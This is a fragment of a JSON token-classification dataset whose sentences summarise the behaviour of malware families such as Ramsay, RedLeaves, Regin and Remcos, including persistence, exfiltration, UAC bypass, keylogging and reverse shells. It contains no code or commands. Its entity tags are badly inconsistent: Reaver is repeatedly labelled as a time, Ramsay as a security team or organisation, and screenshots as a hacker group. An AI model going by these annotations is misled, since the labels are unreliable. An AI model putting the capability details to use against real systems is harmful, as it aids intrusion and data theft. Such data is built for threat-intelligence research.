"collected", "files", "using", "WinRAR." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ramsay", "can", "conduct", "an", "initial", "scan", "for", "Microsoft", "Word", "documents", "on", "the", "local", "system,", "removable", "media,", "and", "connected", "network", "drives,", "before", "tagging", "and", "collecting", "them.", "It", "can", "continue", "tagging", "documents", "to", "collect", "with", "follow", "up", "scans." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "use", "UACMe", "for", "privilege", "escalation." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Ramsay", "can", "use", "the", "Windows", "COM", "API", "to", "schedule", "tasks", "and", "maintain", "persistence." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "hijack", "outdated", "Windows", "application", "dependencies", "with", "malicious", "versions", "of", "its", "own", "DLL", "payload." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "collect", "Microsoft", "Word", "documents", "from", "the", "target's", "file", "system,", "as", "well", "as", "<code>.txt</code>,", "<code>.doc</code>,", "and", "<code>.xls</code>", "files", "from", "the", "Internet", "Explorer", "cache." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "collect", "data", "from", "network", "drives", "and", "stage", "it", "for", "exfiltration." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "collect", "data", "from", "removable", "media", "and", "stage", "it", "for", "exfiltration." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "extract", "its", "agent", "from", "the", "body", "of", "a", "malicious", "document." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "been", "delivered", "using", "OLE", "objects", "in", "malicious", "documents." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "use", "<code>ImprovedReflectiveDLLInjection</code>", "to", "deploy", "components." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "been", "embedded", "in", "documents", "exploiting", "CVE-2017-0199,", "CVE-2017-11882,", "and", "CVE-2017-8570." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Ramsay", "can", "collect", "directory", "and", "file", "lists." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Ramsay", "can", "stage", "data", "prior", "to", "exfiltration", "in", "<code>%APPDATA%\\Microsoft\\UserSetting</code>", "and", "<code>%APPDATA%\\Microsoft\\UserSetting\\MediaCache</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Ramsay", "has", "been", "executed", "through", "malicious", "e-mail", "attachments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Ramsay", "has", "masqueraded", "as", "a", "JPG", "image", "file." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "masqueraded", "as", "a", "7zip", "installer." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Ramsay", "can", "use", "Windows", "API", "functions", "such", "as", "<code>WriteFile</code>,", "<code>CloseHandle</code>,", "and", "<code>GetCurrentHwProfile</code>", "during", "its", "collection", "and", "file", "storage", "operations.", "Ramsay", "can", "execute", "its", "embedded", "components", "via", "<code>CreateProcessA</code>", "and", "<code>ShellExecute</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "scan", "for", "systems", "that", "are", "vulnerable", "to", "the", "EternalBlue", "exploit." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Exp" ] }, { "tokens": [ "Ramsay", "can", "scan", "for", "network", "drives", "which", "may", "contain", "documents", "for", "collection." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "base64-encoded", "its", "portable", "executable", "and", "hidden", "itself", "under", "a", "JPG", "header.", "Ramsay", "can", "also", "embed", "information", "within", "document", "footers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "scan", "for", "removable", "media", "which", "may", "contain", "documents", "for", "collection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "gather", "a", "list", "of", "running", "processes", "by", "using", "Tasklist." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Ramsay", "has", "created", "Registry", "Run", "keys", "to", "establish", "persistence." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "spread", "itself", "by", "infecting", "other", "portable", "executable", "files", "on", "removable", "drives." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "B-Way", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "included", "a", "rootkit", "to", "evade", "defenses." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "schedule", "tasks", "via", "the", "Windows", "COM", "API", "to", "maintain", "persistence." ], "ner_tags": [ "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "take", "screenshots", "every", "30", "seconds", "as", "well", "as", "when", "an", "external", "removable", "storage", "device", "is", "connected." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "been", "distributed", "through", "spearphishing", "emails", "with", "malicious", "attachments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "used", "base64", "to", "encode", "its", "C2", "traffic." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "PE", "data", "embedded", "within", "JPEG", "files", "contained", "within", "Word", "documents." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "I-SamFile", "O" ] }, { "tokens": [ "Ramsay", "can", "detect", "system", "information--including", "disk", "names,", "total", "space,", "and", "remaining", "space--to", "create", "a", "hardware", "profile", "GUID", "which", "acts", "as", "a", "system", "identifier", "for", "operators." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "use", "ipconfig", "and", "Arp", "to", "collect", "network", "configuration", "information,", "including", "routing", "information", "and", "ARP", "tables." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "use", "<code>netstat</code>", "to", "enumerate", "network", "connections." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "can", "spread", "itself", "by", "infecting", "other", "portable", "executable", "files", "on", "networks", "shared", "drives." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "B-Way", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "included", "embedded", "Visual", "Basic", "scripts", "in", "malicious", "documents." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Tool", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Ramsay", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "RawDisk", "was", "used", "in", "Shamoon", "to", "write", "to", "protected", "system", "locations", "such", "as", "the", "MBR", "and", "disk", "partitions", "in", "an", "effort", "to", "destroy", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "RawDisk", "has", "been", "used", "to", "directly", "access", "the", "hard", "disk", "to", "help", "overwrite", "arbitrarily", "sized", "portions", "of", "disk", "content." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RawDisk", "was", "used", "in", "Shamoon", "to", "help", "overwrite", "components", "of", "disk", "structure", "like", "the", "MBR", "and", "disk", "partitions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-SamFile", "O", "B-Tool", "O" ] }, { "tokens": [ "RawPOS", "encodes", "credit", "card", "data", "it", "collected", "from", "the", "victim", "with", "XOR." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RawPOS", "dumps", "memory", "from", "specific", "processes", "on", "a", "victim", "system,", "parses", "the", "dumped", "files,", "and", "scrapes", "them", "for", "credit", "card", "data." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Data", "captured", "by", "RawPOS", "is", "placed", "in", "a", "temporary", "file", "under", "a", "directory", "named", "\"memdump\"." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "New", "services", "created", "by", "RawPOS", "are", "made", "to", "appear", "like", "legitimate", "Windows", "services,", "with", "names", "such", "as", "\"Windows", "Management", "Help", "Service\",", "\"Microsoft", "Support\",", "and", "\"Windows", "Advanced", "Task", "Manager\"." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Idus", "I-Tool", "O", "O", "O", "O", "B-Tool", "O", "I-Tool", "O" ] }, { "tokens": [ "RawPOS", "installs", "itself", "as", "a", "service", "to", "maintain", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rclone", "can", "compress", "files", "using", "`gzip`", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Rclone", "\"chunker\"", "overlay", "supports", "splitting", "large", "files", "in", "smaller", "chunks", "during", "upload", "to", "circumvent", "size", "limits." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Rclone", "can", "exfiltrate", "data", "over", "SFTP", "or", "HTTPS", "via", "WebDAV." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "B-Features", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Rclone", "can", "exfiltrate", "data", "over", "FTP", "or", "HTTP,", "including", "HTTP", "via", "WebDAV." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Rclone", "can", "exfiltrate", "data", "to", "cloud", "storage", "services", "such", "as", "Dropbox,", "Google", "Drive,", "Amazon", "S3,", "and", "MEGA." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Rclone", "can", "list", "files", "and", "directories", "with", "the", "`ls`,", "`lsd`,", "and", "`lsl`", "commands." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "encrypts", "collected", "data", "with", "an", "incremental", "XOR", "key", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "drops", "and", "executes", "a", "malicious", "CPL", "file", "as", "its", "payload." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "encrypts", "some", "of", "its", "files", "with", "XOR." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "deletes", "the", "original", "dropped", "file", "from", "the", "victim." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Reaver", "variants", "use", "raw", "TCP", "for", "C2." ], "ner_tags": [ "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Reaver", "queries", "the", "Registry", "to", "determine", "the", "correct", "Startup", "path", "to", "use", "for", "persistence." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "creates", "a", "shortcut", "file", "and", "saves", "it", "in", "a", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "creates", "a", "shortcut", "file", "and", "saves", "it", "in", "a", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-Time", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "collects", "system", "information", "from", "the", "victim,", "including", "CPU", "speed,", "computer", "name,", "volume", "serial", "number,", "ANSI", "code", "page,", "OEM", "code", "page", "identifier", "for", "the", "OS,", "Microsoft", "Windows", "version,", "and", "memory", "information." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "collects", "the", "victim's", "IP", "address." ], "ner_tags": [ "B-Time", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Reaver", "collects", "the", "victim's", "username." ], "ner_tags": [ "B-Time", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "Reaver", "variants", "use", "HTTP", "for", "C2." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Reaver", "installs", "itself", "as", "a", "new", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "can", "gather", "browser", "usernames", "and", "passwords." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-HackOrg", "O", "O" ] }, { "tokens": [ "RedLeaves", "is", "launched", "through", "use", "of", "DLL", "search", "order", "hijacking", "to", "load", "a", "malicious", "dll." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "RedLeaves", "configuration", "file", "is", "encrypted", "with", "a", "simple", "XOR", "key,", "0x53." ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "can", "delete", "specified", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "RedLeaves", "can", "enumerate", "and", "search", "for", "files", "and", "directories." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "is", "capable", "of", "downloading", "a", "file", "from", "a", "specified", "URL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "can", "use", "HTTP", "over", "non-standard", "ports,", "such", "as", "995,", "for", "C2." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "attempts", "to", "add", "a", "shortcut", "file", "in", "the", "Startup", "folder", "to", "achieve", "persistence.", "If", "this", "fails,", "it", "attempts", "to", "add", "Registry", "Run", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Features", "O" ] }, { "tokens": [ "RedLeaves", "can", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "RedLeaves", "attempts", "to", "add", "a", "shortcut", "file", "in", "the", "Startup", "folder", "to", "achieve", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "has", "encrypted", "C2", "traffic", "with", "RC4,", "previously", "using", "keys", "of", "88888888", "and", "babybear." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "RedLeaves", "can", "gather", "extended", "system", "information", "including", "the", "hostname,", "OS", "version", "number,", "platform,", "memory", "information,", "time", "elapsed", "since", "system", "startup,", "and", "CPU", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "can", "obtain", "information", "about", "network", "parameters." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "RedLeaves", "can", "enumerate", "drives", "and", "Remote", "Desktop", "sessions." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "B-Way", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "RedLeaves", "can", "obtain", "information", "about", "the", "logged", "on", "user", "both", "locally", "and", "for", "Remote", "Desktop", "sessions." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "RedLeaves", "can", "communicate", "to", "its", "C2", "over", "HTTP", "and", "HTTPS", "if", "directed." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "RedLeaves", "can", "receive", "and", "execute", "commands", "with", "cmd.exe.", "It", "can", "also", "provide", "a", "reverse", "shell." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Reg", "may", "be", "used", "to", "find", "credentials", "in", "the", "Windows", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Reg", "may", "be", "used", "to", "interact", "with", "and", "modify", "the", "Windows", "Registry", "of", "a", "local", "or", "remote", "system", "at", "the", "command-line", "interface." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Reg", "may", "be", "used", "to", "gather", "details", "from", "the", "Windows", "Registry", "of", "a", "local", "or", "remote", "system", "at", "the", "command-line", "interface." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "use", "Dropbox", "as", "its", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "decrypt", "strings", "with", "a", "key", "either", "stored", "in", "the", "Registry", "or", "hardcoded", "in", "the", "code." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "store", "its", "encryption", "key", "in", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "download", "files", "from", "C2." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "create", "seemingly", "legitimate", "Registry", "key", "to", "store", "its", "encryption", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "use", "control-flow", "flattening", "or", "the", "commercially", "available", ".NET", "Reactor", "for", "obfuscation." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "extract", "and", "execute", "PowerShell", "scripts", "from", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "hide", "data", "in", "images,", "including", "use", "of", "the", "Least", "Significant", "Bit", "(LSB)." ], "ner_tags": [ "B-Way", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RegDuke", "can", "persist", "using", "a", "WMI", "consumer", "that", "is", "launched", "every", "time", "a", "process", "named", "WINWORD.EXE", "is", "started." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Regin", "leveraged", "several", "compromised", "universities", "as", "proxies", "to", "obscure", "its", "origin." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Regin", "malware", "platform", "supports", "many", "standard", "protocols,", "including", "SMB." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Regin", "has", "used", "a", "hidden", "file", "system", "to", "store", "some", "of", "its", "components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Regin", "stage", "1", "modules", "for", "64-bit", "systems", "have", "been", "found", "to", "be", "signed", "with", "fake", "certificates", "masquerading", "as", "originating", "from", "Microsoft", "Corporation", "and", "Broadcom", "Corporation." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "I-Org", "O", "B-Org", "O" ] }, { "tokens": [ "Regin", "contains", "a", "keylogger." ], "ner_tags": [ "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "Regin", "appears", "to", "have", "functionality", "to", "modify", "remote", "Registry", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "The", "Regin", "malware", "platform", "uses", "Extended", "Attributes", "to", "store", "encrypted", "executables." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Regin", "appears", "to", "have", "functionality", "to", "sniff", "for", "credentials", "passed", "over", "HTTP,", "SMTP,", "and", "SMB." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "The", "Regin", "malware", "platform", "can", "use", "ICMP", "to", "communicate", "between", "infected", "computers." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Regin", "malware", "platform", "can", "use", "Windows", "admin", "shares", "to", "move", "laterally." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Regin", "malware", "platform", "supports", "many", "standard", "protocols,", "including", "HTTP", "and", "HTTPS." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Remcos", "can", "capture", "data", "from", "the", "system’s", "microphone." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "has", "a", "command", "for", "UAC", "bypassing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "steals", "and", "modifies", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "can", "search", "for", "files", "on", "the", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "can", "upload", "and", "download", "files", "to", "and", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "has", "a", "command", "for", "keylogging." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "has", "full", "control", "of", "the", "Registry,", "including", "the", "ability", "to", "modify", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "uses", "RC4", "and", "base64", "to", "obfuscate", "data,", "including", "Registry", "entries", "and", "file", "paths." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "has", "a", "command", "to", "hide", "itself", "through", "injecting", "into", "another", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Remcos", "uses", "the", "infected", "hosts", "as", "SOCKS5", "proxies", "to", "allow", "for", "tunneling", "and", "proxying." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "uses", "Python", "scripts." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "Remcos", "can", "add", "itself", "to", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "takes", "automated", "screenshots", "of", "the", "infected", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Remcos", "searches", "for", "Sandboxie", "and", "VMware", "on", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Remcos", "can", "access", "a", "system’s", "webcam", "and", "take", "pictures." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Remcos", "can", "launch", "a", "remote", "command", "line", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Remexi", "has", "a", "command", 